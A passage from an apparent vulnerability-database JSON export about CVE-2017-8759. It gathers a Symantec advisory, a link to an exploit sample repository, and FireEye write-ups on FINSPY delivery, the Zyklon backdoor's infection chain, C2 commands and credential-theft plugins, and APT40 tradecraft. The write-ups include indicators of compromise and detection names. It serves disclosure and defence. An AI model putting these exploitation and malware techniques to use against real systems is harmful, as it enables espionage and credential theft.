](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/hardening-the-system-and-maintaining-integrity-with-windows-defender-system-guard?ocid=cx-blog-mmpc>)\n\n[Move away from passwords, deploy Windows Hello. Today! ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/move-away-from-passwords-deploy-windows-hello-today?ocid=cx-blog-mmpc>)\n\n[What\u2019s new in Windows Defender ATP Fall Creators Update](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/whats-new-in-windows-defender-atp-fall-creators-update?ocid=cx-blog-mmpc>)\n\n[Antivirus evolved](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved?ocid=cx-blog-mmpc>)\n\n \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "modified": "2017-10-23T13:05:08", "published": "2017-10-23T13:05:08", "href": "https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", "id": "MMPC:C13F25080AC9B1B34AF77630B988E9E8", "type": "mmpc", "title": "Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-13T06:16:56", "bulletinFamily": "software", "cvelist": ["CVE-2017-8759"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. 
Failed exploit attempts will result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Framework 2.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "id": "SMNTC-100742", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/100742", "type": "symantec", "title": "Microsoft Windows .NET Framework CVE-2017-8759 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:04:10", "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\r\n\r\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.\r\n\r\nFireEye email, endpoint and network products detected the malicious documents.\r\n\r\n### Vulnerability Used to Target Russian Speakers\r\n\r\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\r\n\r\nFINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a \u201clawful intercept\u201d capability. 
Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicate that related activity, though potentially for a different client, might have occurred as early as July 2017.\r\n\r\n### CVE-2017-8759 WSDL Parser Code Injection\r\n\r\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method (http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl check does not perform correct validation when the provided data contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\r\n\r\n\r\nFigure 1: Vulnerable WSDL Parser\r\n\r\nWhen multiple address definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that, due to the lack of CRLF validation, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of the .NET Framework and loaded by the Office executables as a DLL.\r\n\r\n\r\nFigure 2: SOAP definition VS Generated code\r\n\r\n### The In-the-Wild Attacks\r\n\r\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sample contained embedded SOAP monikers to facilitate exploitation (Figure 3).\r\n\r\n\r\nFigure 3: SOAP Moniker\r\n\r\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. 
The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of the .NET Framework, parses the content and generates a .cs source file in the working directory. The csc.exe of the .NET Framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\r\n\r\n\r\nFigure 4: DLL loaded\r\n\r\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve an HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\r\n\r\n\r\nFigure 5: Live requests\r\n\r\nThe malware will be placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process creation chain under Process Monitor.\r\n\r\n\r\nFigure 6: Process Created Chain\r\n\r\n### The Malware\r\n\r\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\r\n\r\n### Conclusion\r\n\r\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. 
These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\r\n\r\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero-day used to distribute FINSPY in April 2017, CVE-2017-0199, was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.", "published": "2017-09-14T00:00:00", "type": "seebug", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "modified": "2017-09-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96484", "id": "SSV:96484", "sourceData": "\n https://github.com/Voulnet/CVE-2017-8759-Exploit-sample\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96484"}], "fireeye": [{"lastseen": "2017-10-11T08:32:49", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>), a SOAP [WSDL](<https://msdn.microsoft.com/en-us/library/ms996486.aspx>) parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. 
FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found [here](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>).\n\nFireEye email, endpoint and network products detected the malicious documents.\n\n#### Vulnerability Used to Target Russian Speakers\n\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\n\nFINSPY malware, also reported as FinFisher or [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), is available for purchase as part of a \u201clawful intercept\u201d capability. Based on this and previous use of [FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. 
Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicate that related activity, though potentially for a different client, might have occurred as early as July 2017.\n\n#### CVE-2017-8759 WSDL Parser Code Injection\n\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ([http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111](<http://referencesource.microsoft.com/#System.Runtime.Remoting/metadata/wsdlparser.cs,6111>)). The IsValidUrl check does not perform correct validation when the provided data contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\n\n \nFigure 1: Vulnerable WSDL Parser\n\nWhen multiple _address_ definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that, due to the lack of CRLF validation, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of the .NET Framework and loaded by the Office executables as a DLL.\n\n \nFigure 2: SOAP definition VS Generated code\n\n#### The In-the-Wild Attacks\n\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) documents we previously reported on. The malicious sample contained embedded SOAP monikers to facilitate exploitation (Figure 3).\n\n \nFigure 3: SOAP Moniker\n\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. 
The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of the .NET Framework, parses the content and generates a .cs source file in the working directory. The csc.exe of the .NET Framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\n\nFigure 4: DLL loaded\n\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve an HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, the compiled DLL and the PDB files from disk, then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which, in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\n\nFigure 5: Live requests\n\nThe malware is placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process creation chain under Process Monitor.\n\nFigure 6: Process Created Chain\n\n#### The Malware\n\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\n\n#### Conclusion\n\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. 
These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\n\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero-day used to distribute FINSPY in April 2017, CVE-2017-0199, was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.\n\n#### Acknowledgement\n\nThank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.\n", "modified": "2017-09-12T13:00:00", "published": "2017-09-12T13:00:00", "id": "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "href": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "type": "fireeye", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:21", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "description": "#### Introduction\n\nFireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. 
Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.\n\nZyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.\n\n#### Infection Vector\n\nWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).\n\nThe following industries have been the primary targets in this campaign:\n\n * Telecommunications\n * Insurance\n * Financial Services\n\nFigure 1: Sample lure documents\n\n#### Attack Flow\n\n 1. Spam email arrives in the victim\u2019s mailbox as a ZIP attachment, which contains a malicious DOC file.\n 2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell-based payload takes over.\n 3. 
The PowerShell script is responsible for downloading the final payload from the C2 server and executing it.\n\nA visual representation of the attack flow and execution chain can be seen in Figure 2.\n\nFigure 2: Zyklon attack flow\n\n#### Infection Techniques\n\n##### CVE-2017-8759\n\nThis vulnerability was [discovered by FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017, and it is a vulnerability we have observed being exploited in the wild.\n\nThe DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).\n\nFigure 3: Embedded URL in OLE object\n\n##### CVE-2017-11882\n\nSimilarly, we have also observed actors leveraging another recently [discovered](<https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html>) vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).\n\nFigure 4: Embedded URL in OLE object\n\nFigure 5: HTTP GET request to download the next level payload\n\nThe downloaded file, _doc.doc_, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads _Pause.ps1_.\n\nFigure 6: PowerShell command to download the Pause.ps1 payload\n\n##### Dynamic Data Exchange (DDE)\n\nDynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. 
With the help of a PowerShell script (shown in Figure 7), the next payload (_Pause.ps1_) is downloaded.\n\nFigure 7: DDE technique used to download the Pause.ps1 payload\n\nOne of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).\n\nFigure 8 shows the network communication of the _Pause.ps1_ download.\n\nFigure 8: Network communication to download the Pause.ps1 payload\n\n#### Zyklon Delivery\n\nIn all these techniques, the same domain is used to download the next level payload (_Pause.ps1_), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).\n\nThe _Pause.ps1_ script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The resolved APIs include VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.\n\nFigure 9: Base64 decoded Pause.ps1\n\nThe injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with the .NET Framework.\n\nFigure 10: Network traffic to download final payload (words.exe)\n\nOnce executed, the file performs the following activities:\n\n 1. Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).\n 2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .NET resource section.\n 3. The unpacked code is Zyklon.\n\nFigure 11: XML configuration file to schedule the task\n\nThe Zyklon malware first retrieves the external IP address of the infected machine using the following services:\n\n * api.ipify[.]org\n * ip.anysrc[.]net\n * myexternalip[.]com\n * whatsmyip[.]com\n\nThe Zyklon executable contains another encrypted file in its .NET resource section named _tor_. 
This file is decrypted and injected into an instance of _InstallUtil.exe_, and functions as a Tor anonymizer.\n\n#### Command & Control Communication\n\nThe C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server; the request URL is formed by appending gate.php, a string stored in the file's memory, to the C2 server address. The parameter passed in this request is getkey=y. In response, the C2 server returns a Base64-encoded RSA public key (seen in Figure 12).\n\nFigure 12: Zyklon public RSA key\n\nAfter the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.\n\nCommand | Action\n---|---\nsign | Requests system information\nsettings | Requests settings from C2 server\nlogs | Uploads harvested passwords\nwallet | Uploads harvested cryptocurrency wallet data\nproxy | Indicates SOCKS proxy port opened\nminer | Cryptocurrency miner commands\nerror | Reports errors to C2 server\nddos | DDoS attack commands\n\nTable 1: Zyklon accepted commands\n\nThe following figures show the initial request and subsequent server response for the \u201csettings\u201d (Figure 13), \u201csign\u201d (Figure 14), and \u201cddos\u201d (Figure 15) commands.\n\nFigure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response\n\nFigure 14: Zyklon issuing \u201csign\u201d command and subsequent server response\n\nFigure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response\n\n#### Plugin Manager\n\nZyklon downloads a number of plugins from its C2 server. 
The plugin URL is stored in the file in the following format:\n\n * /plugin/index.php?plugin=<_Plugin_Name_>\n\nThe following plugins are found in the memory of the Zyklon malware:\n\n * /plugin/index.php?plugin=cuda\n * /plugin/index.php?plugin=minerd\n * /plugin/index.php?plugin=sgminer\n * /plugin/index.php?plugin=socks\n * /plugin/index.php?plugin=tor\n * /plugin/index.php?plugin=games\n * /plugin/index.php?plugin=software\n * /plugin/index.php?plugin=ftp\n * /plugin/index.php?plugin=email\n * /plugin/index.php?plugin=browser\n\nThe downloaded plugins are injected into: Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe.\n\n#### Additional Features\n\nThe Zyklon malware offers the following additional capabilities (via plugins):\n\n##### Browser Password Recovery\n\nZyklon HTTP can recover passwords from popular web browsers, including:\n\n * Google Chrome\n * Mozilla Firefox\n * Internet Explorer\n * Opera Browser\n * Chrome Canary/SXS\n * CoolNovo Browser\n * Apple Safari\n * Flock Browser\n * SeaMonkey Browser\n * SRWare Iron Browser\n * Comodo Dragon Browser\n\n##### FTP Password Recovery\n\nZyklon currently supports FTP password recovery from the following FTP applications:\n\n * FileZilla\n * SmartFTP\n * FlashFXP\n * FTPCommander\n * Dreamweaver\n * WS_FTP\n\n##### Gaming Software Key Recovery\n\nZyklon can recover PC gaming software keys from the following games:\n\n * Battlefield\n * Call of Duty\n * FIFA\n * NFS\n * Age of Empires\n * Quake\n * The Sims\n * Half-Life\n * IGI\n * Star Wars\n\n##### Email Password Recovery\n\nZyklon may also collect email passwords from the following applications:\n\n * Microsoft Outlook Express\n * Microsoft Outlook 2002/XP/2003/2007/2010/2013\n * Mozilla Thunderbird\n * Windows Live Mail 2012\n * IncrediMail, Foxmail v6.x - v7.x\n * Windows Live Messenger\n * MSN Messenger\n * Google Talk\n * GMail Notifier\n * PaltalkScene IM\n * Pidgin (Formerly Gaim) Messenger\n * Miranda Messenger\n * Windows Credential 
Manager\n\n##### License Key Recovery\n\nThe malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.\n\n##### Socks5 Proxy\n\nZyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.\n\n##### Hijack Clipboard Bitcoin Address\n\nZyklon has the ability to hijack the clipboard and replace the user\u2019s copied bitcoin address with an address served up by the actor\u2019s control server.\n\n#### Zyklon Pricing\n\nResearchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:\n\n * Normal build: $75 (USD)\n * Tor-enabled build: $125 (USD)\n * Rebuild/Updates: $15 (USD)\n * Payment Method: Bitcoin (BTC)\n\n#### Conclusion\n\nThreat actors incorporating recently discovered vulnerabilities in popular software \u2013 Microsoft Office, in this case \u2013 only increase the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.\n\nAt the time of writing, the FireEye [Multi Vector Execution (MVX) engine](<https://www.fireeye.com/>) is able to recognize and block this threat. 
Table 2 lists the current detection and blocking capabilities by product.\n\nDetection Name | Product | Action\n---|---|---\nPOWERSHELL DOWNLOADER D (METHODOLOGY) | HX | Detect\nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY) | HX | Detect\nPOWERSHELL DOWNLOADER (METHODOLOGY) | HX | Detect\nSUSPICIOUS EQNEDT USAGE (METHODOLOGY) | HX | Detect\nTOR (TUNNELER) | HX | Detect\nSUSPICIOUS SVCHOST.EXE (METHODOLOGY) | HX | Detect\nMalware.Binary.rtf | EX/ETP/NX | Block\nMalware.Binary | EX/ETP/NX | Block\nFE_Exploit_RTF_CVE_2017_8759 | EX/ETP/NX | Block\nFE_Exploit_RTF_CVE201711882_1 | EX/ETP/NX | Block\n\nTable 2: Current detection capabilities by FireEye products\n\n#### Indicators of Compromise\n\nThe analysis contained here is based on the representative sample lures shown in Table 3.\n\nMD5 | Name\n---|---\n76011037410d031aa41e5d381909f9ce | accounts.doc\n4bae7fb819761a7ac8326baf8d8eb6ab | Courrier.doc\neb5fa454ab42c8aec443ba8b8c97339b | doc.doc\n886a4da306e019aa0ad3a03524b02a1c | Pause.ps1\n04077ecbdc412d6d87fc21e4b3a4d088 | words.exe\n\nTable 3: Sample Zyklon lures\n\n##### Network Indicators\n\n", "modified": "2018-01-17T12:00:00", "published": "2018-01-17T12:00:00", "id": "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "href": "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "type": "fireeye", "title": "Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-02T10:01:23", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8759"], "description": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China\u2019s naval modernization effort. The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.\n\n#### Mission\n\nIn December 2016, China\u2019s People\u2019s Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China\u2019s actions in cyberspace; within a year APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40\u2019s emphasis on maritime issues and naval technology ultimately supports China\u2019s ambition to establish a blue-water navy.\n\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. 
Most recently, this has included [victims with connections to elections](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) in Southeast Asia, which is likely driven by events affecting China\u2019s Belt and Road Initiative. China\u2019s \u201cOne Belt, One Road\u201d (\u4e00\u5e26\u4e00\u8def) or \u201cBelt and Road Initiative\u201d (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China\u2019s influence across the greater region.\n\nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia\n\n#### Attribution\n\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor\u2019s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group\u2019s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China-based domain resellers and had Whois records with Chinese location information, suggesting a China-based infrastructure procurement process.\n\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an [open indexed server](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. 
All of the logins to this C2 were from computers configured with Chinese language settings.\n\n#### Attack Lifecycle\n\n_Initial Compromise_\n\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.\n\n * APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.\n * The operation\u2019s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.\n * APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:\n   * [CVE-2012-0158](<https://intelligence.fireeye.com/reports/12-19517>)\n   * [CVE-2017-0199](<https://intelligence.fireeye.com/reports/17-00003493>)\n   * [CVE-2017-8759](<https://intelligence.fireeye.com/reports/17-00010114>)\n   * [CVE-2017-11882](<https://intelligence.fireeye.com/reports/17-00012724>)\n\nFigure 2: APT40 attack lifecycle\n\n_Establish Foothold_\n\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.\n\n * First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.\n * PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.\n * APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. 
This methodology proves to be ideal as once these credentials are obtained, they may not need to rely as heavily on malware to continue the mission.\n\n_Escalate Privileges_\n\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.\n\n * APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.\n * Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.\n\n_Internal Reconnaissance_\n\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\n\n * APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.\n * APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim\u2019s environment.\n * Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.\n\n_Lateral Movement_\n\nAPT40 uses many 